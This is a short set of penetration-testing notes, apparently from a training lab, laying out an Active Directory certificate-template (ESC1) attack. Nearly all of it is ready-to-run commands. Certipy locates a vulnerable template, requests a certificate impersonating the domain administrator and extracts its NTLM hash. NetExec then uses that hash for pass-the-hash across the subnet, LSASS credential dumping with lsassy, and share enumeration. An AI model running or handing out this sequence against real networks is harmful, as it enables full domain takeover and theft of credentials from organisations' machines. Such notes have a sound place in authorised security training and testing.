Check for vulnerable and obtain CA + vulnerable template:
certipy find -username fcastle@Marvel.local -password Password1 -dc-ip 192.168.218.136 -stdout -debug -scheme ldapNote whether it allows for Domain Users or Domain Computers to enroll
This case means you need a Domain Computer to abuse this
- Combine with Machine Quota 10 (default) attack to create a machine account
- Dump machine with local admin for machine credentials (can use Mimikatz for this as well)
Obtain CN and certificate server (aka -target):
nxc ldap 192.168.218.136 -u 'fcastle' -p 'Password1' -M adcsrun the ESC1 attack:
certipy req -u "MachineAccName" -p "MachinePassword" -dc-ip 192.168.218.136 -target "CertServer.marvel.local" -ca "MARVELCA" -template "vulnCert" -upn "administrator@marvel.local" -dns-tcpif there are issues, you can use -debug at the end as well.
Retrieve the hash from pfx:
certipy auth -pfx administrator.pfx -dc-ip 192.168.218.136 -username administrator -domain Marvel.localUse the NTLM hash for more things like:
Pass The Hash for machine access:
nxc smb 192.168.218.0/24 -u "administrator" -H hashGoesHereLsassy:
nxc smb 192.168.218.0/24 -u "administrator" -H hashGoesHere -M lsassycan be done to the DC only:
nxc smb 192.168.218.136 -u "administrator" -H hashGoesHere -M lsassyenum shares:
nxc smb 192.168.218.0/24 -u "administrator" -H hashGoesHere --shares